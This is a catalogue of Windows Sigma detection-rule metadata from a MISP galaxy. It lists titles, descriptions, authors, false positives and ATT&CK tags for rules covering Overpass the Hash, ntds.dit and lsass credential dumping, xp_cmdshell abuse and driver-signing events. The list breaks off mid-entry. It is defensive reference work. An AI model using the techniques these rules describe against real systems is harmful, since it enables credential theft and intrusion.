tags ['attack.persistence', 'attack.t1098']

Successful Account Login Via WMI

Detects successful logon attempts performed with WMI

Internal MISP references

UUID 5af54681-df95-4c26-854f-2565e13cfab0 which can be used as unique global reference for Successful Account Login Via WMI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/12/04
falsepositive ['Monitoring tools', 'Legitimate system administration']
filename win_security_susp_wmi_login.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1047']

Potential Access Token Abuse

Detects potential token impersonation and theft, for example when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS" flag.

Internal MISP references

UUID 02f7c9c1-1ae8-4c6a-8add-04693807f92f which can be used as unique global reference for Potential Access Token Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michaela Adams, Zach Mathis
creation_date 2022/11/06
falsepositive ['Anti-Virus']
filename win_security_access_token_abuse.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1134.001', 'stp.4u']

A Member Was Removed From a Security-Enabled Global Group

Detects activity when a member is removed from a security-enabled global group

Internal MISP references

UUID 02c39d30-02b5-45d2-b435-8aebfe5a8629 which can be used as unique global reference for A Member Was Removed From a Security-Enabled Global Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2023/04/26
falsepositive ['Unknown']
filename win_security_member_removed_security_enabled_global_group.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']

RottenPotato Like Attack Pattern

Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like

Internal MISP references

UUID 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f which can be used as unique global reference for RottenPotato Like Attack Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SBousseaden, Florian Roth
creation_date 2019/11/15
falsepositive ['Unknown']
filename win_security_susp_rottenpotato.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access', 'attack.t1557.001']

Remote WMI ActiveScriptEventConsumers

Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network

Internal MISP references

UUID 9599c180-e3a8-4743-8f92-7fb96d3be648 which can be used as unique global reference for Remote WMI ActiveScriptEventConsumers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/09/02
falsepositive ['SCCM']
filename win_security_scrcons_remote_wmi_scripteventconsumer.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1546.003']

Scanner PoC for CVE-2019-0708 RDP RCE Vuln

Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep

Internal MISP references

UUID 8400629e-79a9-4737-b387-5db940ab2367 which can be used as unique global reference for Scanner PoC for CVE-2019-0708 RDP RCE Vuln in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Adam Bradbury (idea)
creation_date 2019/06/02
falsepositive ['Unlikely']
filename win_security_rdp_bluekeep_poc_scanner.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1210', 'car.2013-07-002']

External Remote RDP Logon from Public IP

Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.

Internal MISP references

UUID 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 which can be used as unique global reference for External Remote RDP Logon from Public IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)
creation_date 2023/01/19
falsepositive ['Legitimate or intentional inbound connections from public IP addresses on the RDP port.']
filename win_security_successful_external_remote_rdp_login.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1133', 'attack.t1078', 'attack.t1110']

Successful Overpass the Hash Attempt

Detects a successful logon with logon type 9 (NewCredentials), which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module.

Internal MISP references

UUID 192a0330-c20b-4356-90b6-7b7049ae0b87 which can be used as unique global reference for Successful Overpass the Hash Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (source), Dominik Schaudel (rule)
creation_date 2018/02/12
falsepositive ['Runas command-line tool using /netonly parameter']
filename win_security_overpass_the_hash.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.s0002', 'attack.t1550.002']

A Member Was Added to a Security-Enabled Global Group

Detects activity when a member is added to a security-enabled global group

Internal MISP references

UUID c43c26be-2e87-46c7-8661-284588c5a53e which can be used as unique global reference for A Member Was Added to a Security-Enabled Global Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2023/04/26
falsepositive ['Unknown']
filename win_security_member_added_security_enabled_global_group.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']

Admin User Remote Logon

Detects a remote logon by the Administrator user (depending on the internal naming pattern).

Internal MISP references

UUID 0f63e1ef-1eb9-4226-9d54-8927ca08520a which can be used as unique global reference for Admin User Remote Logon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4
creation_date 2017/10/29
falsepositive ['Legitimate administrative activity.']
filename win_security_admin_rdp_login.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1078.001', 'attack.t1078.002', 'attack.t1078.003', 'car.2016-04-005']

Certificate Exported From Local Certificate Store

Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.

Internal MISP references

UUID 58c0bff0-40a0-46e8-b5e8-b734b84d2017 which can be used as unique global reference for Certificate Exported From Local Certificate Store in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/13
falsepositive ['Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed']
filename win_certificateservicesclient_lifecycle_system_cert_exported.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1649']

NTLM Brute Force

Detects common NTLM brute force device names

Internal MISP references

UUID 9c8acf1a-cbf9-4db6-b63c-74baabe03e59 which can be used as unique global reference for NTLM Brute Force in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jerry Shockley '@jsh0x'
creation_date 2022/02/02
falsepositive ['Systems with names equal to the spoofed ones used by the brute force tools']
filename win_susp_ntlm_brute_force.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110']

NTLM Logon

Detects logons using NTLM, which could be caused by a legacy source or attackers

Internal MISP references

UUID 98c3bcf1-56f2-49dc-9d8d-c66cf190238b which can be used as unique global reference for NTLM Logon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/08
falsepositive ['Legacy hosts']
filename win_susp_ntlm_auth.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1550.002']

Potential Remote Desktop Connection to Non-Domain Host

Detects logons using NTLM to hosts that are potentially not part of the domain.

Internal MISP references

UUID ce5678bb-b9aa-4fb5-be4b-e57f686256ad which can be used as unique global reference for Potential Remote Desktop Connection to Non-Domain Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton
creation_date 2020/05/22
falsepositive ['Host connections to valid domains, exclude these.', 'Host connections not using host FQDN.', 'Host connections to external legitimate domains.']
filename win_susp_ntlm_rdp.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Dump Ntds.dit To Suspicious Location

Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location

Internal MISP references

UUID 94dc4390-6b7c-4784-8ffc-335334404650 which can be used as unique global reference for Dump Ntds.dit To Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate backup operation/creating shadow copies']
filename win_esent_ntdsutil_abuse_susp_location.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution']

Ntdsutil Abuse

Detects potential abuse of ntdsutil to dump ntds.dit database

Internal MISP references

UUID e6e88853-5f20-4c4a-8d26-cd469fd8d31f which can be used as unique global reference for Ntdsutil Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate backup operation/creating shadow copies']
filename win_esent_ntdsutil_abuse.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

Audit CVE Event

Detects events generated by user-mode applications when they call the CveEventWrite API because exploitation of a known vulnerability is being attempted. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.

Internal MISP references

UUID 48d91a3a-2363-43ba-a456-ca71ac3da5c2 which can be used as unique global reference for Audit CVE Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Zach Mathis
creation_date 2020/01/15
falsepositive ['Unknown']
filename win_audit_cve.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1203', 'attack.privilege_escalation', 'attack.t1068', 'attack.defense_evasion', 'attack.t1211', 'attack.credential_access', 'attack.t1212', 'attack.lateral_movement', 'attack.t1210', 'attack.impact', 'attack.t1499.004']

Backup Catalog Deleted

Detects backup catalog deletions

Internal MISP references

UUID 9703792d-fd9a-456d-a672-ff92efe4806a which can be used as unique global reference for Backup Catalog Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)
creation_date 2017/05/12
falsepositive ['Unknown']
filename win_susp_backup_delete.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']

Microsoft Malware Protection Engine Crash - WER

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Internal MISP references

UUID 6c82cf5c-090d-4d57-9188-533577631108 which can be used as unique global reference for Microsoft Malware Protection Engine Crash - WER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/09
falsepositive ['MsMpEng might crash if the "C:\" partition is full']
filename win_application_msmpeng_crash_wer.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1211', 'attack.t1562.001']

Microsoft Malware Protection Engine Crash

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Internal MISP references

UUID 545a5da6-f103-4919-a519-e9aec1026ee4 which can be used as unique global reference for Microsoft Malware Protection Engine Crash in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/09
falsepositive ['MsMpEng might crash if the "C:\" partition is full']
filename win_application_msmpeng_crash_error.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1211', 'attack.t1562.001']

Potential Credential Dumping Via WER - Application

Detects a Windows Error Reporting event where the process that crashed is lsass. This could indicate an intentional crash induced by techniques such as Lsass-Shtinkering to dump credentials.

Internal MISP references

UUID a18e0862-127b-43ca-be12-1a542c75c7c5 which can be used as unique global reference for Potential Credential Dumping Via WER - Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/07
falsepositive ['Rare legitimate crashing of the lsass process']
filename win_werfault_susp_lsass_credential_dump.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Restricted Software Access By SRP

Detects restricted access to applications by the Software Restriction Policies (SRP) policy

Internal MISP references

UUID b4c8da4a-1c12-46b0-8a2b-0a8521d03442 which can be used as unique global reference for Restricted Software Access By SRP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/12
falsepositive ['Unknown']
filename win_software_restriction_policies_block.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1072']

Relevant Anti-Virus Signature Keywords In Application Log

Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.

Internal MISP references

UUID 78bc5783-81d9-4d73-ac97-59f6db4f72a8 which can be used as unique global reference for Relevant Anti-Virus Signature Keywords In Application Log in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Arnim Rupp
creation_date 2017/02/19
falsepositive ['Some software piracy tools (key generators, cracks) are classified as hack tools']
filename win_av_relevant_match.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.resource_development', 'attack.t1588']

Remote Access Tool - ScreenConnect File Transfer

Detects file being transferred via ScreenConnect RMM

Internal MISP references

UUID 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13 which can be used as unique global reference for Remote Access Tool - ScreenConnect File Transfer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect']
filename win_app_remote_access_tools_screenconnect_file_transfer.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']

Remote Access Tool - ScreenConnect Command Execution

Detects command execution via ScreenConnect RMM

Internal MISP references

UUID 076ebe48-cc05-4d8f-9d41-89245cd93a14 which can be used as unique global reference for Remote Access Tool - ScreenConnect Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect']
filename win_app_remote_access_tools_screenconnect_command_exec.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']

Atera Agent Installation

Detects successful installation of the Atera Remote Monitoring & Management (RMM) agent, which was recently found to be used by Conti operators

Internal MISP references

UUID 87261fb2-69d0-42fe-b9de-88c6b5f65a43 which can be used as unique global reference for Atera Agent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/09/01
falsepositive ['Legitimate Atera agent installation']
filename win_software_atera_rmm_agent_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.t1219']

MSI Installation From Suspicious Locations

Detects MSI package installation from suspicious locations

Internal MISP references

UUID c7c8aa1c-5aff-408e-828b-998e3620b341 which can be used as unique global reference for MSI Installation From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/31
falsepositive ['False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use.']
filename win_msi_install_from_susp_locations.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution']

MSI Installation From Web

Detects installation of a remote MSI file from the web.

Internal MISP references

UUID 5594e67a-7f92-4a04-b65d-1a42fd824a60 which can be used as unique global reference for MSI Installation From Web in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stamatis Chatzimangou
creation_date 2022/10/23
falsepositive ['Unknown']
filename win_msi_install_from_web.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Application Uninstalled

An application has been removed. Check if it is critical.

Internal MISP references

UUID 570ae5ec-33dc-427c-b815-db86228ad43e which can be used as unique global reference for Application Uninstalled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/28
falsepositive ['Unknown']
filename win_builtin_remove_application.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

MSSQL Server Failed Logon

Detects failed logon attempts from clients to MSSQL server.

Internal MISP references

UUID 218d2855-2bba-4f61-9c85-81d0ea63ac71 which can be used as unique global reference for MSSQL Server Failed Logon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), j4son
creation_date 2023/10/11
falsepositive ["This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them"]
filename win_mssql_failed_logon.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

MSSQL SPProcoption Set

Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started.

Internal MISP references

UUID b3d57a5c-c92e-4b48-9a79-5f124b7cf964 which can be used as unique global reference for MSSQL SPProcoption Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/13
falsepositive ['Legitimate use of the feature by administrators (rare)']
filename win_mssql_sp_procoption_set.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

MSSQL XPCmdshell Option Change

Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed

Internal MISP references

UUID d08dd86f-681e-4a00-a92c-1db218754417 which can be used as unique global reference for MSSQL XPCmdshell Option Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Legitimate enable/disable of the setting', 'Note that since the event contain the change for both values. This means that this will trigger on both enable and disable']
filename win_mssql_xp_cmdshell_change.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution']

MSSQL Server Failed Logon From External Network

Detects failed logon attempts from clients with an external network IP to an MSSQL server. This can be a sign of a brute-force attack.

Internal MISP references

UUID ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d which can be used as unique global reference for MSSQL Server Failed Logon From External Network in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author j4son
creation_date 2023/10/11
falsepositive ['Unknown']
filename win_mssql_failed_logon_from_external_network.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

MSSQL XPCmdshell Suspicious Execution

Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands

Internal MISP references

UUID 7f103213-a04e-4d59-8261-213dddf22314 which can be used as unique global reference for MSSQL XPCmdshell Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unknown']
filename win_mssql_xp_cmdshell_audit_log.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution']

MSSQL Add Account To Sysadmin Role

Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role

Internal MISP references

UUID 08200f85-2678-463e-9c32-88dce2f073d1 which can be used as unique global reference for MSSQL Add Account To Sysadmin Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/13
falsepositive ['Rare legitimate administrative activity']
filename win_mssql_add_sysadmin_account.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

MSSQL Disable Audit Settings

Detects when an attacker executes the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" statement in order to delete or disable audit logs on the server.

Internal MISP references

UUID 350dfb37-3706-4cdc-9e2e-5e24bc3a46df which can be used as unique global reference for MSSQL Disable Audit Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/13
falsepositive ["This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up"]
filename win_mssql_disable_audit_settings.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Scheduled Task Executed Uncommon LOLBIN

Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task

Internal MISP references

UUID f0767f15-0fb3-44b9-851e-e8d9a6d0005d which can be used as unique global reference for Scheduled Task Executed Uncommon LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule']
filename win_taskscheduler_lolbin_execution_via_task_scheduler.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Scheduled Task Executed From A Suspicious Location

Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or is an unusual program to be run from a Scheduled Task.

Internal MISP references

UUID 424273ea-7cf8-43a6-b712-375f925e481f which can be used as unique global reference for Scheduled Task Executed From A Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_taskscheduler_execution_from_susp_locations.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Important Scheduled Task Deleted

Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID 9e3cb244-bdb8-4632-8c90-6079c8f4f16d which can be used as unique global reference for Important Scheduled Task Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Unknown']
filename win_taskscheduler_susp_schtasks_delete.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

USB Device Plugged

Detects plugged/unplugged USB devices

Internal MISP references

UUID 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4 which can be used as unique global reference for USB Device Plugged in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/09
falsepositive ['Legitimate administrative activity']
filename win_usb_device_plugged.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.t1200']
Related clusters

To see the related clusters, click here.

Loading Diagcab Package From Remote Path

Detects loading of diagcab packages from a remote path, as seen in the DogWalk vulnerability.

Internal MISP references

UUID 50cb47b8-2c33-4b23-a2e9-4600657d9746 which can be used as unique global reference for Loading Diagcab Package From Remote Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate package hosted on a known and authorized remote location']
filename win_diagnosis_scripted_load_remote_diagcab.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution']

CodeIntegrity - Revoked Image Loaded

Detects image load events, reported by Code Integrity, where the image's certificate has been revoked.

Internal MISP references

UUID 881b7725-47cc-4055-8000-425823344c59 which can be used as unique global reference for CodeIntegrity - Revoked Image Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_revoked_image_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Blocked Image Load With Revoked Certificate

Detects image load events that Code Integrity blocked because the image's certificate has been revoked.

Internal MISP references

UUID 6f156c48-3894-4952-baf0-16193e9067d2 which can be used as unique global reference for CodeIntegrity - Blocked Image Load With Revoked Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_revoked_image_blocked.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module

Detects loaded kernel modules that did not meet the WHQL signing requirements.

Internal MISP references

UUID 2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f which can be used as unique global reference for CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_whql_failure.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Unmet Signing Level Requirements By File Under Validation

Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation.

Internal MISP references

UUID f8931561-97f5-4c46-907f-0a4a592e47a7 which can be used as unique global reference for CodeIntegrity - Unmet Signing Level Requirements By File Under Validation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/20
falsepositive ['Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule.']
filename win_codeintegrity_attempted_dll_load.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution']

CodeIntegrity - Unsigned Kernel Module Loaded

Detects the presence of a loaded unsigned kernel module on the system.

Internal MISP references

UUID 951f8d29-f2f6-48a7-859f-0673ff105e6f which can be used as unique global reference for CodeIntegrity - Unsigned Kernel Module Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_unsigned_driver_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Unsigned Image Loaded

Detects an unsigned image loaded on the system.

Internal MISP references

UUID c92c24e7-f595-493f-9c98-53d5142f5c18 which can be used as unique global reference for CodeIntegrity - Unsigned Image Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_unsigned_image_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked

Detects block events for files that are disallowed by code integrity for protected processes

Internal MISP references

UUID 5daf11c3-022b-4969-adb9-365e6c078c7c which can be used as unique global reference for CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_blocked_protected_process_file.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

CodeIntegrity - Blocked Image/Driver Load For Policy Violation

Detects blocked load events that did not meet the Authenticode signing level requirements or violated the code integrity policy.

Internal MISP references

UUID e4be5675-4a53-426a-8c81-a8bb2387e947 which can be used as unique global reference for CodeIntegrity - Blocked Image/Driver Load For Policy Violation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/10
falsepositive ['Unknown']
filename win_codeintegrity_enforced_policy_block.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

CodeIntegrity - Blocked Driver Load With Revoked Certificate

Detects blocked load attempts of revoked drivers

Internal MISP references

UUID 9b72b82d-f1c5-4632-b589-187159bc6ec1 which can be used as unique global reference for CodeIntegrity - Blocked Driver Load With Revoked Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unknown']
filename win_codeintegrity_revoked_driver_blocked.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

CodeIntegrity - Revoked Kernel Driver Loaded

Detects the load of a revoked kernel driver

Internal MISP references

UUID 320fccbf-5e32-4101-82b8-2679c5f007c6 which can be used as unique global reference for CodeIntegrity - Revoked Kernel Driver Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/06
falsepositive ['Unlikely']
filename win_codeintegrity_revoked_driver_loaded.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

Suspicious Rejected SMB Guest Logon From IP

Detects attempted PrintNightmare (CVE-2021-1675) remote code execution in the Windows Spooler Service.

Internal MISP references

UUID 71886b70-d7b4-4dbf-acce-87d2ca135262 which can be used as unique global reference for Suspicious Rejected SMB Guest Logon From IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w
creation_date 2021/06/30
falsepositive ['Account fallback reasons (after failed login with specific account)']
filename win_smbclient_security_susp_failed_guest_logon.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1110.001']
Related clusters

To see the related clusters, click here.

Suspicious Application Installed

Detects suspicious application installed by looking at the added shortcut to the app resolver cache

Internal MISP references

UUID 83c161b6-ca67-4f33-8ad0-644a0737cf07 which can be used as unique global reference for Suspicious Application Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
